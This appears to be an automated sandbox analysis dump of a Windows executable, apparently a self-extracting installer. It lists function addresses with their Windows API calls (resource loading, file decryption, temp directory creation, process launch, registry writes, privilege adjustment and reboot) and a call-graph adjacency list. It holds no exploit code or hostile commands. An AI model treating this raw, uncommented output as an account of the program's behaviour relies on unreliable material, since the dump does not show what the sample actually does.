2393->2489 2506 13468f FindResourceA SizeofResource 2395->2506 2398 132ef3 2401 1344b9 20 API calls 2398->2401 2399 132d2d CreateEventA SetEvent 2400 13468f 7 API calls 2399->2400 2403 132d57 2400->2403 2402 132d6e 2401->2402 2405 136ce0 4 API calls 2402->2405 2404 132d5b 2403->2404 2406 132e1f 2403->2406 2410 13468f 7 API calls 2403->2410 2407 1344b9 20 API calls 2404->2407 2409 132c62 2405->2409 2511 135c9e 2406->2511 2407->2402 2409->2385 2436 132f1d 2409->2436 2412 132d9f 2410->2412 2412->2404 2415 132da3 CreateMutexA 2412->2415 2413 132e30 2413->2398 2414 132e3a 2416 132e43 2414->2416 2417 132e52 FindResourceA 2414->2417 2415->2406 2418 132dbd GetLastError 2415->2418 2537 132390 2416->2537 2421 132e64 LoadResource 2417->2421 2422 132e6e 2417->2422 2418->2406 2420 132dca 2418->2420 2424 132dd5 2420->2424 2425 132dea 2420->2425 2421->2422 2423 132e4d 2422->2423 2552 1336ee GetVersionExA 2422->2552 2423->2402 2426 1344b9 20 API calls 2424->2426 2427 1344b9 20 API calls 2425->2427 2428 132de8 2426->2428 2429 132dff 2427->2429 2431 132e04 CloseHandle 2428->2431 2429->2406 2429->2431 2431->2402 2435 136517 24 API calls 2435->2423 2437 132f3f 2436->2437 2438 132f6c 2436->2438 2440 132f5f 2437->2440 2641 1351e5 2437->2641 2660 135164 2438->2660 2788 133a3f 2440->2788 2441 132f71 2472 13303c 2441->2472 2673 1355a0 2441->2673 2448 136ce0 4 API calls 2450 132c6b 2448->2450 2449 132f86 GetSystemDirectoryA 2451 13658a CharPrevA 2449->2451 2476 1352b6 2450->2476 2452 132fab LoadLibraryA 2451->2452 2453 132fc0 GetProcAddress 2452->2453 2454 132ff7 FreeLibrary 2452->2454 2453->2454 2455 132fd6 DecryptFileA 2453->2455 2456 133017 SetCurrentDirectoryA 2454->2456 2457 133006 2454->2457 2455->2454 2465 132ff0 2455->2465 2458 133026 2456->2458 2459 133054 2456->2459 2457->2456 2721 13621e GetWindowsDirectoryA 2457->2721 2461 1344b9 20 API calls 2458->2461 2471 133061 2459->2471 2731 133b26 2459->2731 2464 133037 2461->2464 2807 136285 GetLastError 2464->2807 2465->2454 2468 133098 2468->2472 2474 1330af 2468->2474 2469 13307a 2469->2468 2751 133ba2 2469->2751 2471->2469 2471->2472 2740 13256d 2471->2740 2472->2448 2809 134169 2474->2809 2477 1352d6 2476->2477 2485 135316 2476->2485 2480 135300 LocalFree LocalFree 2477->2480 2481 1352eb SetFileAttributesA DeleteFileA 2477->2481 2478 135374 2479 13538c 2478->2479 3115 131fe1 2478->3115 2482 136ce0 4 API calls 2479->2482 2480->2477 2480->2485 2481->2480 2484 132c72 2482->2484 2484->2385 2484->2393 2485->2478 2486 13535e SetCurrentDirectoryA 2485->2486 2487 1365e8 4 API calls 2485->2487 2488 132390 13 API calls 2486->2488 2487->2486 2488->2478 2490 131f9a 2489->2490 2492 131f9f 2489->2492 2491 131ea7 15 API calls 2490->2491 2491->2492 2493 1344b9 20 API calls 2492->2493 2496 131fd9 2492->2496 2497 131fc0 2492->2497 2493->2497 2494 131ee2 GetCurrentProcess OpenProcessToken 2499 131f23 LookupPrivilegeValueA AdjustTokenPrivileges CloseHandle 2494->2499 2500 131f0e 2494->2500 2495 131fcf ExitWindowsEx 2495->2496 2496->2385 2497->2494 2497->2495 2497->2496 2499->2500 2501 131f6b ExitWindowsEx 2499->2501 2503 1344b9 20 API calls 2500->2503 2501->2500 2502 131f1f 2501->2502 2504 136ce0 4 API calls 2502->2504 2503->2502 2505 131f8c 2504->2505 2505->2385 2507 1346b6 2506->2507 2508 132d1a 2506->2508 2507->2508 2509 1346be FindResourceA LoadResource LockResource 2507->2509 2508->2398 2508->2399 2509->2508 2510 1346df memcpy_s FreeResource 2509->2510 2510->2508 2518 135e17 2511->2518 2535 135cc3 2511->2535 2512 135dd0 2516 135dec GetModuleFileNameA 2512->2516 2512->2518 2513 136ce0 4 API calls 2515 132e2c 2513->2515 2514 135ced CharNextA 2514->2535 2515->2413 2515->2414 2517 135e0a 2516->2517 2516->2518 2587 1366c8 2517->2587 2518->2513 2520 136218 2596 136e2a 2520->2596 2523 135e36 CharUpperA 2524 1361d0 2523->2524 2523->2535 2525 1344b9 20 API calls 2524->2525 2526 1361e7 2525->2526 2527 1361f0 CloseHandle 2526->2527 2528 1361f7 ExitProcess 2526->2528 2527->2528 2529 135f9f CharUpperA 2529->2535 2530 135f59 CompareStringA 2530->2535 2531 136003 CharUpperA 2531->2535 2532 135edc CharUpperA 2532->2535 2533 1360a2 CharUpperA 2533->2535 2534 13667f IsDBCSLeadByte CharNextA 2534->2535 2535->2512 2535->2514 2535->2518 2535->2520 2535->2523 2535->2529 2535->2530 2535->2531 2535->2532 2535->2533 2535->2534 2592 13658a 2535->2592 2538 1324cb 2537->2538 2541 1323b9 2537->2541 2539 136ce0 4 API calls 2538->2539 2540 1324dc 2539->2540 2540->2423 2541->2538 2542 1323e9 FindFirstFileA 2541->2542 2542->2538 2550 132407 2542->2550 2543 132421 lstrcmpA 2545 132431 lstrcmpA 2543->2545 2546 1324a9 FindNextFileA 2543->2546 2544 132479 2547 132488 SetFileAttributesA DeleteFileA 2544->2547 2545->2546 2545->2550 2548 1324bd FindClose RemoveDirectoryA 2546->2548 2546->2550 2547->2546 2548->2538 2549 13658a CharPrevA 2549->2550 2550->2543 2550->2544 2550->2546 2550->2549 2551 132390 5 API calls 2550->2551 2551->2550 2556 133737 2552->2556 2558 13372d 2552->2558 2553 1344b9 20 API calls 2565 1339fc 2553->2565 2554 136ce0 4 API calls 2555 132e92 2554->2555 2555->2402 2555->2423 2567 1318a3 2555->2567 2556->2558 2559 1338a4 2556->2559 2556->2565 2603 1328e8 2556->2603 2558->2553 2558->2565 2559->2558 2560 1339c1 MessageBeep 2559->2560 2559->2565 2561 13681f 10 API calls 2560->2561 2562 1339ce 2561->2562 2564 1367c9 EnumResourceLanguagesA 2562->2564 2566 1339d8 MessageBoxA 2562->2566 2564->2566 2565->2554 2566->2565 2568 1318d5 2567->2568 2569 1319b8 2567->2569 2632 1317ee LoadLibraryA 2568->2632 2570 136ce0 4 API calls 2569->2570 2572 1319d5 2570->2572 2572->2423 2572->2435 2574 1318e5 GetCurrentProcess OpenProcessToken 2574->2569 2575 131900 GetTokenInformation 2574->2575 2576 1319aa CloseHandle 2575->2576 2577 131918 GetLastError 2575->2577 2576->2569 2577->2576 2578 131927 LocalAlloc 2577->2578 2579 1319a9 2578->2579 2580 131938 GetTokenInformation 2578->2580 2579->2576 2581 1319a2 LocalFree 2580->2581 2582 13194e AllocateAndInitializeSid 2580->2582 2581->2579 2582->2581 2585 13196e 2582->2585 2583 131999 FreeSid 2583->2581 2584 131975 EqualSid 2584->2585 2586 13198c 2584->2586 2585->2583 2585->2584 2585->2586 2586->2583 2590 1366d5 2587->2590 2588 1366f3 2588->2518 2590->2588 2591 1366e5 CharNextA 2590->2591 2599 136648 2590->2599 2591->2590 2593 13659b 2592->2593 2593->2593 2594 1365b8 CharPrevA 2593->2594 2595 1365ab 2593->2595 2594->2595 2595->2535 2602 136cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2596->2602 2598 13621d 2600 13665d IsDBCSLeadByte 2599->2600 2601 136668 2599->2601 2600->2601 2601->2590 2602->2598 2604 132a62 2603->2604 2605 13290d 2603->2605 2606 132a75 2604->2606 2607 132a6e GlobalFree 2604->2607 2605->2604 2609 132955 GlobalAlloc 2605->2609 2611 132a20 GlobalUnlock 2605->2611 2612 132a80 GlobalUnlock 2605->2612 2613 132773 2605->2613 2606->2559 2607->2606 2609->2604 2610 132968 GlobalLock 2609->2610 2610->2604 2610->2605 2611->2605 2612->2604 2614 1327a3 CharUpperA CharNextA CharNextA 2613->2614 2615 1328b2 2613->2615 2616 1328b7 GetSystemDirectoryA 2614->2616 2617 1327db 2614->2617 2615->2616 2620 1328bf 2616->2620 2618 1327e3 2617->2618 2619 1328a8 GetWindowsDirectoryA 2617->2619 2624 13658a CharPrevA 2618->2624 2619->2620 2621 1328d2 2620->2621 2622 13658a CharPrevA 2620->2622 2623 136ce0 4 API calls 2621->2623 2622->2621 2625 1328e2 2623->2625 2626 132810 RegOpenKeyExA 2624->2626 2625->2605 2626->2620 2627 132837 RegQueryValueExA 2626->2627 2628 13289a RegCloseKey 2627->2628 2629 13285c 2627->2629 2628->2620 2630 132867 ExpandEnvironmentStringsA 2629->2630 2631 13287a 2629->2631 2630->2631 2631->2628 2633 131890 2632->2633 2634 131826 GetProcAddress 2632->2634 2635 136ce0 4 API calls 2633->2635 2636 131889 FreeLibrary 2634->2636 2637 131839 AllocateAndInitializeSid 2634->2637 2638 13189f 2635->2638 2636->2633 2637->2636 2639 13185f FreeSid 2637->2639 2638->2569 2638->2574 2639->2636 2642 13468f 7 API calls 2641->2642 2643 1351f9 LocalAlloc 2642->2643 2644 13522d 2643->2644 2645 13520d 2643->2645 2647 13468f 7 API calls 2644->2647 2646 1344b9 20 API calls 2645->2646 2648 13521e 2646->2648 2649 13523a 2647->2649 2650 136285 GetLastError 2648->2650 2651 135262 lstrcmpA 2649->2651 2652 13523e 2649->2652 2659 132f4d 2650->2659 2653 135272 LocalFree 2651->2653 2654 13527e 2651->2654 2655 1344b9 20 API calls 2652->2655 2653->2659 2656 1344b9 20 API calls 2654->2656 2657 13524f LocalFree 2655->2657 2658 135290 LocalFree 2656->2658 2657->2659 2658->2659 2659->2438 2659->2440 2659->2472 2661 13468f 7 API calls 2660->2661 2662 135175 2661->2662 2663 13517a 2662->2663 2664 1351af 2662->2664 2666 1344b9 20 API calls 2663->2666 2665 13468f 7 API calls 2664->2665 2667 1351c0 2665->2667 2668 13518d 2666->2668 2822 136298 2667->2822 2668->2441 2671 1351e1 2671->2441 2672 1344b9 20 API calls 2672->2668 2674 13468f 7 API calls 2673->2674 2675 1355c7 LocalAlloc 2674->2675 2676 1355db 2675->2676 2677 1355fd 2675->2677 2678 1344b9 20 API calls 2676->2678 2679 13468f 7 API calls 2677->2679 2680 1355ec 2678->2680 2681 13560a 2679->2681 2682 136285 GetLastError 2680->2682 2683 135632 lstrcmpA 2681->2683 2684 13560e 2681->2684 2707 1355f1 2682->2707 2685 135645 2683->2685 2686 13564b LocalFree 2683->2686 2687 1344b9 20 API calls 2684->2687 2685->2686 2688 135696 2686->2688 2689 13565b 2686->2689 2690 13561f LocalFree 2687->2690 2691 13589f 2688->2691 2694 1356ae GetTempPathA 2688->2694 2695 135467 49 API calls 2689->2695 2690->2707 2692 136517 24 API calls 2691->2692 2692->2707 2693 136ce0 4 API calls 2696 132f7e 2693->2696 2697 1356eb 2694->2697 2698 1356c3 2694->2698 2699 135678 2695->2699 2696->2449 2696->2472 2703 135717 GetDriveTypeA 2697->2703 2704 13586c GetWindowsDirectoryA 2697->2704 2697->2707 2834 135467 2698->2834 2702 1344b9 20 API calls 2699->2702 2699->2707 2702->2707 2708 135730 GetFileAttributesA 2703->2708 2719 13572b 2703->2719 2868 13597d GetCurrentDirectoryA SetCurrentDirectoryA 2704->2868 2707->2693 2708->2719 2710 135467 49 API calls 2710->2697 2711 132630 21 API calls 2711->2719 2713 1357c1 GetWindowsDirectoryA 2713->2719 2714 13658a CharPrevA 2716 1357e8 GetFileAttributesA 2714->2716 2715 13597d 34 API calls 2715->2719 2717 1357fa CreateDirectoryA 2716->2717 2716->2719 2717->2719 2718 135827 SetFileAttributesA 2718->2719 2719->2703 2719->2704 2719->2707 2719->2708 2719->2711 2719->2713 2719->2714 2719->2715 2719->2718 2720 135467 49 API calls 2719->2720 2864 136952 2719->2864 2720->2719 2722 136249 2721->2722 2723 136268 2721->2723 2725 1344b9 20 API calls 2722->2725 2724 13597d 34 API calls 2723->2724 2726 13625f 2724->2726 2727 13625a 2725->2727 2728 136ce0 4 API calls 2726->2728 2729 136285 GetLastError 2727->2729 2730 133013 2728->2730 2729->2726 2730->2456 2730->2472 2732 133b2d 2731->2732 2732->2732 2733 133b72 2732->2733 2734 133b53 2732->2734 2934 134fe0 2733->2934 2736 136517 24 API calls 2734->2736 2737 133b70 2736->2737 2738 136298 10 API calls 2737->2738 2739 133b7b 2737->2739 2738->2739 2739->2471 2741 132583 2740->2741 2742 132622 2740->2742 2744 13258b 2741->2744 2745 1325e8 RegOpenKeyExA 2741->2745 2961 1324e0 GetWindowsDirectoryA 2742->2961 2746 1325e3 2744->2746 2749 13259b RegOpenKeyExA 2744->2749 2745->2746 2747 132609 RegQueryInfoKeyA 2745->2747 2746->2469 2748 1325d1 RegCloseKey 2747->2748 2748->2746 2749->2746 2750 1325bc RegQueryValueExA 2749->2750 2750->2748 2752 133bdb 2751->2752 2755 133bec 2751->2755 2753 13468f 7 API calls 2752->2753 2753->2755 2754 133c03 memset 2754->2755 2755->2754 2756 133d13 2755->2756 2759 13468f 7 API calls 2755->2759 2760 133d26 2755->2760 2763 133d7b CompareStringA 2755->2763 2764 133fd7 2755->2764 2766 133fab 2755->2766 2769 133f46 LocalFree 2755->2769 2770 133f1e LocalFree 2755->2770 2774 133cc7 CompareStringA 2755->2774 2785 133e10 2755->2785 2969 131ae8 2755->2969 3010 13202a memset memset RegCreateKeyExA 2755->3010 3036 133fef 2755->3036 2757 1344b9 20 API calls 2756->2757 2757->2760 2759->2755 2761 136ce0 4 API calls 2760->2761 2762 133f60 2761->2762 2762->2468 2763->2755 2763->2764 2764->2760 3060 132267 2764->3060 2768 1344b9 20 API calls 2766->2768 2772 133fbe LocalFree 2768->2772 2769->2760 2770->2755 2770->2764 2772->2760 2774->2755 2775 133f92 2778 1344b9 20 API calls 2775->2778 2776 133e1f GetProcAddress 2777 133f64 2776->2777 2776->2785 2780 1344b9 20 API calls 2777->2780 2779 133fa9 2778->2779 2781 133f7c LocalFree 2779->2781 2782 133f75 FreeLibrary 2780->2782 2783 136285 GetLastError 2781->2783 2782->2781 2784 133f8b 2783->2784 2784->2760 2785->2775 2785->2776 2786 133f40 FreeLibrary 2785->2786 2787 133eff FreeLibrary 2785->2787 3050 136495 2785->3050 2786->2769 2787->2770 2789 13468f 7 API calls 2788->2789 2790 133a55 LocalAlloc 2789->2790 2791 133a8e 2790->2791 2792 133a6c 2790->2792 2794 13468f 7 API calls 2791->2794 2793 1344b9 20 API calls 2792->2793 2795 133a7d 2793->2795 2796 133a98 2794->2796 2797 136285 GetLastError 2795->2797 2798 133ac5 lstrcmpA 2796->2798 2799 133a9c 2796->2799 2805 132f64 2797->2805 2801 133ada 2798->2801 2802 133b0d LocalFree 2798->2802 2800 1344b9 20 API calls 2799->2800 2803 133aad LocalFree 2800->2803 2804 136517 24 API calls 2801->2804 2802->2805 2803->2805 2806 133aec LocalFree 2804->2806 2805->2438 2805->2472 2806->2805 2808 13628f 2807->2808 2808->2472 2810 13468f 7 API calls 2809->2810 2811 13417d LocalAlloc 2810->2811 2812 134195 2811->2812 2813 1341a8 2811->2813 2814 1344b9 20 API calls 2812->2814 2815 13468f 7 API calls 2813->2815 2817 1341a6 2814->2817 2816 1341b5 2815->2816 2818 1341c5 lstrcmpA 2816->2818 2820 1341b9 2816->2820 2817->2472 2819 1341e6 LocalFree 2818->2819 2818->2820 2819->2817 2821 1344b9 20 API calls 2820->2821 2821->2819 2823 13171e _vsnprintf 2822->2823 2824 1362c9 FindResourceA 2823->2824 2826 136353 2824->2826 2827 1362cb LoadResource LockResource 2824->2827 2828 136ce0 4 API calls 2826->2828 2827->2826 2830 1362e0 2827->2830 2829 1351ca 2828->2829 2829->2671 2829->2672 2831 136355 FreeResource 2830->2831 2832 13631b FreeResource 2830->2832 2831->2826 2833 13171e _vsnprintf 2832->2833 2833->2824 2835 13548a 2834->2835 2853 13551a 2834->2853 2894 1353a1 2835->2894 2837 135581 2841 136ce0 4 API calls 2837->2841 2840 135495 2840->2837 2844 1354c2 GetSystemInfo 2840->2844 2845 13550c 2840->2845 2846 13559a 2841->2846 2842 13553b CreateDirectoryA 2847 135577 2842->2847 2848 135547 2842->2848 2843 13554d 2843->2837 2849 13597d 34 API calls 2843->2849 2856 1354da 2844->2856 2850 13658a CharPrevA 2845->2850 2846->2707 2858 132630 GetWindowsDirectoryA 2846->2858 2851 136285 GetLastError 2847->2851 2848->2843 2852 13555c 2849->2852 2850->2853 2854 13557c 2851->2854 2852->2837 2857 135568 RemoveDirectoryA 2852->2857 2905 1358c8 2853->2905 2854->2837 2855 13658a CharPrevA 2855->2845 2856->2845 2856->2855 2857->2837 2859 13266f 2858->2859 2860 13265e 2858->2860 2862 136ce0 4 API calls 2859->2862 2861 1344b9 20 API calls 2860->2861 2861->2859 2863 132687 2862->2863 2863->2697 2863->2710 2865 1369a1 2864->2865 2866 13696e GetDiskFreeSpaceA 2864->2866 2865->2719 2866->2865 2867 136989 MulDiv 2866->2867 2867->2865 2869 1359bb 2868->2869 2870 1359dd GetDiskFreeSpaceA 2868->2870 2871 1344b9 20 API calls 2869->2871 2872 135ba1 memset 2870->2872 2873 135a21 MulDiv 2870->2873 2874 1359cc 2871->2874 2875 136285 GetLastError 2872->2875 2873->2872 2876 135a50 GetVolumeInformationA 2873->2876 2877 136285 GetLastError 2874->2877 2878 135bbc GetLastError FormatMessageA 2875->2878 2879 135ab5 SetCurrentDirectoryA 2876->2879 2880 135a6e memset 2876->2880 2887 1359d1 2877->2887 2881 135be3 2878->2881 2889 135acc 2879->2889 2882 136285 GetLastError 2880->2882 2883 1344b9 20 API calls 2881->2883 2884 135a89 GetLastError FormatMessageA 2882->2884 2885 135bf5 SetCurrentDirectoryA 2883->2885 2884->2881 2885->2887 2886 136ce0 4 API calls 2888 135c11 2886->2888 2887->2886 2888->2697 2890 135b0a 2889->2890 2892 135b20 2889->2892 2891 1344b9 20 API calls 2890->2891 2891->2887 2892->2887 2917 13268b 2892->2917 2896 1353bf 2894->2896 2895 13171e _vsnprintf 2895->2896 2896->2895 2897 13658a CharPrevA 2896->2897 2900 135415 GetTempFileNameA 2896->2900 2898 1353fa RemoveDirectoryA GetFileAttributesA 2897->2898 2898->2896 2899 13544f CreateDirectoryA 2898->2899 2899->2900 2901 13543a 2899->2901 2900->2901 2902 135429 DeleteFileA CreateDirectoryA 2900->2902 2903 136ce0 4 API calls 2901->2903 2902->2901 2904 135449 2903->2904 2904->2840 2906 1358d8 2905->2906 2906->2906 2907 1358df LocalAlloc 2906->2907 2908 1358f3 2907->2908 2909 135919 2907->2909 2910 1344b9 20 API calls 2908->2910 2912 13658a CharPrevA 2909->2912 2911 135906 2910->2911 2913 136285 GetLastError 2911->2913 2915 135534 2911->2915 2914 135931 CreateFileA LocalFree 2912->2914 2913->2915 2914->2911 2916 13595b CloseHandle GetFileAttributesA 2914->2916 2915->2842 2915->2843 2916->2911 2918 1326e5 2917->2918 2919 1326b9 2917->2919 2921 1326ea 2918->2921 2922 13271f 2918->2922 2920 13171e _vsnprintf 2919->2920 2924 1326cc 2920->2924 2925 13171e _vsnprintf 2921->2925 2923 1326e3 2922->2923 2926 13171e _vsnprintf 2922->2926 2927 136ce0 4 API calls 2923->2927 2928 1344b9 20 API calls 2924->2928 2929 1326fd 2925->2929 2930 132735 2926->2930 2931 13276d 2927->2931 2928->2923 2932 1344b9 20 API calls 2929->2932 2933 1344b9 20 API calls 2930->2933 2931->2887 2932->2923 2933->2923 2935 13468f 7 API calls 2934->2935 2936 134ff5 FindResourceA LoadResource LockResource 2935->2936 2937 135020 2936->2937 2950 13515f 2936->2950 2938 135057 2937->2938 2939 135029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2937->2939 2953 134efd 2938->2953 2939->2938 2942 135060 2944 1344b9 20 API calls 2942->2944 2943 13507c 2945 135075 2943->2945 2946 1344b9 20 API calls 2943->2946 2944->2945 2947 135110 FreeResource 2945->2947 2948 13511d 2945->2948 2946->2945 2947->2948 2949 13513a 2948->2949 2951 1344b9 20 API calls 2948->2951 2949->2950 2952 13514c SendMessageA 2949->2952 2950->2737 2951->2949 2952->2950 2954 134f4a 2953->2954 2955 134980 25 API calls 2954->2955 2960 134fa1 2954->2960 2958 134f67 2955->2958 2956 136ce0 4 API calls 2957 134fc6 2956->2957 2957->2942 2957->2943 2959 134b60 FindCloseChangeNotification 2958->2959 2958->2960 2959->2960 2960->2956 2962 132510 2961->2962 2963 13255b 2961->2963 2964 13658a CharPrevA 2962->2964 2965 136ce0 4 API calls 2963->2965 2966 132522 WritePrivateProfileStringA _lopen 2964->2966 2967 132569 2965->2967 2966->2963 2968 132548 _llseek _lclose 2966->2968 2967->2746 2968->2963 2970 131b25 2969->2970 3074 131a84 2970->3074 2972 131b57 2973 13658a CharPrevA 2972->2973 2975 131b8c 2972->2975 2973->2975 2974 1366c8 2 API calls 2976 131bd1 2974->2976 2975->2974 2977 131d73 2976->2977 2978 131bd9 CompareStringA 2976->2978 2980 1366c8 2 API calls 2977->2980 2978->2977 2979 131bf7 GetFileAttributesA 2978->2979 2981 131d53 2979->2981 2982 131c0d 2979->2982 2983 131d7d 2980->2983 2984 131d64 2981->2984 2982->2981 2989 131a84 2 API calls 2982->2989 2985 131d81 CompareStringA 2983->2985 2986 131df8 LocalAlloc 2983->2986 2987 1344b9 20 API calls 2984->2987 2985->2986 2995 131d9b 2985->2995 2986->2984 2988 131e0b GetFileAttributesA 2986->2988 2990 131d6c 2987->2990 2991 131e1d 2988->2991 3008 131e45 2988->3008 2992 131c31 2989->2992 2994 136ce0 4 API calls 2990->2994 2991->3008 2993 131c50 LocalAlloc 2992->2993 2999 131a84 2 API calls 2992->2999 2993->2984 2996 131c67 GetPrivateProfileIntA GetPrivateProfileStringA 2993->2996 2998 131ea1 2994->2998 2995->2995 3000 131dbe LocalAlloc 2995->3000 3002 131cf8 2996->3002 3007 131cc2 2996->3007 2998->2755 2999->2993 3000->2984 3003 131de1 3000->3003 3004 131d23 3002->3004 3005 131d09 GetShortPathNameA 3002->3005 3006 13171e _vsnprintf 3003->3006 3009 13171e _vsnprintf 3004->3009 3005->3004 3006->3007 3007->2990 3080 132aac 3008->3080 3009->3007 3011 13209a 3010->3011 3019 132256 3010->3019 3014 13171e _vsnprintf 3011->3014 3016 1320dc 3011->3016 3012 136ce0 4 API calls 3013 132263 3012->3013 3013->2755 3015 1320af RegQueryValueExA 3014->3015 3015->3011 3015->3016 3017 1320e4 RegCloseKey 3016->3017 3018 1320fb GetSystemDirectoryA 3016->3018 3017->3019 3020 13658a CharPrevA 3018->3020 3019->3012 3021 13211b LoadLibraryA 3020->3021 3022 132179 GetModuleFileNameA 3021->3022 3023 13212e GetProcAddress FreeLibrary 3021->3023 3025 1321de RegCloseKey 3022->3025 3028 132177 3022->3028 3023->3022 3024 13214e GetSystemDirectoryA 3023->3024 3026 132165 3024->3026 3024->3028 3025->3019 3027 13658a CharPrevA 3026->3027 3027->3028 3028->3028 3029 1321b7 LocalAlloc 3028->3029 3030 1321cd 3029->3030 3031 1321ec 3029->3031 3032 1344b9 20 API calls 3030->3032 3033 13171e _vsnprintf 3031->3033 3032->3025 3034 132218 RegSetValueExA RegCloseKey LocalFree 3033->3034 3034->3019 3037 134016 CreateProcessA 3036->3037 3047 134106 3036->3047 3038 134041 WaitForSingleObject GetExitCodeProcess 3037->3038 3039 1340c4 3037->3039 3048 134070 3038->3048 3041 136285 GetLastError 3039->3041 3040 136ce0 4 API calls 3042 134117 3040->3042 3043 1340c9 GetLastError FormatMessageA 3041->3043 3042->2755 3045 1344b9 20 API calls 3043->3045 3045->3047 3046 134096 CloseHandle CloseHandle 3046->3047 3049 1340ba 3046->3049 3047->3040 3107 13411b 3048->3107 3049->3047 3051 1364c2 3050->3051 3052 13658a CharPrevA 3051->3052 3053 1364d8 GetFileAttributesA 3052->3053 3054 136501 LoadLibraryA 3053->3054 3055 1364ea 3053->3055 3057 136508 3054->3057 3055->3054 3056 1364ee LoadLibraryExA 3055->3056 3056->3057 3058 136ce0 4 API calls 3057->3058 3059 136513 3058->3059 3059->2785 3061 132381 3060->3061 3062 132289 RegOpenKeyExA 3060->3062 3063 136ce0 4 API calls 3061->3063 3062->3061 3064 1322b1 RegQueryValueExA 3062->3064 3065 13238c 3063->3065 3066 1322e6 memset GetSystemDirectoryA 3064->3066 3067 132374 RegCloseKey 3064->3067 3065->2760 3068 132321 3066->3068 3069 13230f 3066->3069 3067->3061 3071 13171e _vsnprintf 3068->3071 3070 13658a CharPrevA 3069->3070 3070->3068 3072 13233f RegSetValueExA 3071->3072 3072->3067 3075 131a9a 3074->3075 3077 131aba 3075->3077 3079 131aaf 3075->3079 3093 13667f 3075->3093 3077->2972 3078 13667f 2 API calls 3078->3079 3079->3077 3079->3078 3081 132ad4 GetModuleFileNameA 3080->3081 3082 132be6 3080->3082 3092 132b02 3081->3092 3083 136ce0 4 API calls 3082->3083 3085 132bf5 3083->3085 3084 132af1 IsDBCSLeadByte 3084->3092 3085->2990 3086 132b11 CharNextA CharUpperA 3089 132b8d CharUpperA 3086->3089 3086->3092 3087 132bca CharNextA 3088 132bd3 CharNextA 3087->3088 3088->3092 3089->3092 3091 132b43 CharPrevA 3091->3092 3092->3082 3092->3084 3092->3086 3092->3087 3092->3088 3092->3091 3098 1365e8 3092->3098 3094 136689 3093->3094 3095 1366a5 3094->3095 3096 136648 IsDBCSLeadByte 3094->3096 3097 136697 CharNextA 3094->3097 3095->3075 3096->3094 3097->3094 3099 1365f4 3098->3099 3099->3099 3100 1365fb CharPrevA 3099->3100 3101 136611 CharPrevA 3100->3101 3102 13660b 3101->3102 3103 13661e 3101->3103 3102->3101 3102->3103 3104 136627 CharPrevA 3103->3104 3105 136634 CharNextA 3103->3105 3106 13663d 3103->3106 3104->3105 3104->3106 3105->3106 3106->3092 3108 134132 3107->3108 3110 13412a 3107->3110 3111 131ea7 3108->3111 3110->3046 3112 131eba 3111->3112 3113 131ed3 3111->3113 3114 13256d 15 API calls 3112->3114 3113->3110 3114->3113 3116 131ff0 RegOpenKeyExA 3115->3116 3117 132026 3115->3117 3116->3117 3118 13200f RegDeleteValueA RegCloseKey 3116->3118 3117->2479 3118->3117 3266 136a20 __getmainargs 3267 1319e0 3268 131a03 3267->3268 3269 131a24 GetDesktopWindow 3267->3269 3270 131a20 3268->3270 3272 131a16 EndDialog 3268->3272 3271 1343d0 11 API calls 3269->3271 3274 136ce0 4 API calls 3270->3274 3273 131a33 LoadStringA SetDlgItemTextA MessageBeep 3271->3273 3272->3270 3273->3270 3275 131a7e 3274->3275 3276 136bef _XcptFilter

                                                                                                                                                                                                    Callgraph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    • Opacity -> Relevance
                                                                                                                                                                                                    • Disassembly available
                                                                                                                                                                                                    callgraph 0 Function_00133210 23 Function_00134224 0->23 39 Function_0013597D 0->39 65 Function_0013658A 0->65 71 Function_001344B9 0->71 87 Function_001343D0 0->87 93 Function_001358C8 0->93 1 Function_00137010 2 Function_00135C17 3 Function_00136517 3->71 4 Function_0013411B 80 Function_00131EA7 4->80 5 Function_0013681F 100 Function_001366F9 5->100 106 Function_00136CE0 5->106 6 Function_0013171E 7 Function_0013621E 7->39 62 Function_00136285 7->62 7->71 7->106 8 Function_00132F1D 8->7 18 Function_00133A3F 8->18 22 Function_00133B26 8->22 46 Function_00135164 8->46 47 Function_00134169 8->47 48 Function_0013256D 8->48 8->62 8->65 8->71 74 Function_00133BA2 8->74 78 Function_001355A0 8->78 8->106 110 Function_001351E5 8->110 9 Function_00136C03 33 Function_0013724D 9->33 10 Function_00134702 59 Function_00131680 10->59 68 Function_001316B3 10->68 11 Function_00137000 12 Function_00134200 13 Function_00133100 13->87 14 Function_00137208 15 Function_0013490C 16 Function_00132630 16->71 16->106 17 Function_00134C37 18->3 18->62 67 Function_0013468F 18->67 18->71 19 Function_00136C3F 20 Function_00137120 21 Function_00136A20 22->3 55 Function_00136298 22->55 104 Function_00134FE0 22->104 23->59 23->71 24 Function_00136E2A 96 Function_00136CF0 24->96 25 Function_0013202A 25->6 25->65 25->71 25->106 26 Function_00136952 27 Function_00134A50 28 Function_00133450 28->87 29 Function_00137155 30 Function_00136F54 30->14 30->33 31 Function_00136F40 32 Function_00136648 34 Function_00132773 57 Function_00131781 34->57 34->59 34->65 34->106 35 Function_00137270 36 Function_00136C70 37 Function_0013487A 37->15 38 Function_0013667F 38->32 39->62 64 Function_0013268B 39->64 39->71 39->106 40 Function_00134B60 41 Function_00136A60 41->14 41->19 41->29 41->33 42 Function_00137060 41->42 99 Function_00132BFB 41->99 42->1 42->20 43 Function_00136760 44 Function_00135467 44->39 44->57 44->59 44->62 44->65 76 Function_001353A1 44->76 44->93 44->106 45 Function_00132267 45->6 45->65 45->106 46->55 46->67 46->71 47->67 47->71 105 Function_001324E0 48->105 49 Function_0013476D 49->3 83 Function_001366AE 49->83 50 Function_00136793 51 Function_00132390 51->51 51->59 51->65 51->68 51->106 52 Function_00131F90 52->71 52->80 52->106 53 Function_00136495 53->57 53->65 53->106 54 Function_00134E99 54->59 55->6 55->106 56 Function_00135C9E 56->2 56->24 56->38 56->59 56->65 56->71 94 Function_001366C8 56->94 56->106 107 Function_001331E0 56->107 58 Function_00134980 58->37 58->71 59->57 60 Function_00133680 61 Function_00136380 63 Function_00131A84 63->38 64->6 64->71 64->106 65->68 66 Function_00132A89 68->57 69 Function_001369B0 69->11 69->36 72 Function_00136FBE 69->72 116 Function_001371EF 69->116 70 Function_001352B6 70->51 70->57 103 Function_00131FE1 70->103 70->106 114 Function_001365E8 70->114 71->5 71->6 71->59 92 Function_001367C9 71->92 71->106 72->30 73 Function_001318A3 73->106 119 Function_001317EE 73->119 74->25 74->45 74->53 74->57 74->62 74->67 74->71 74->106 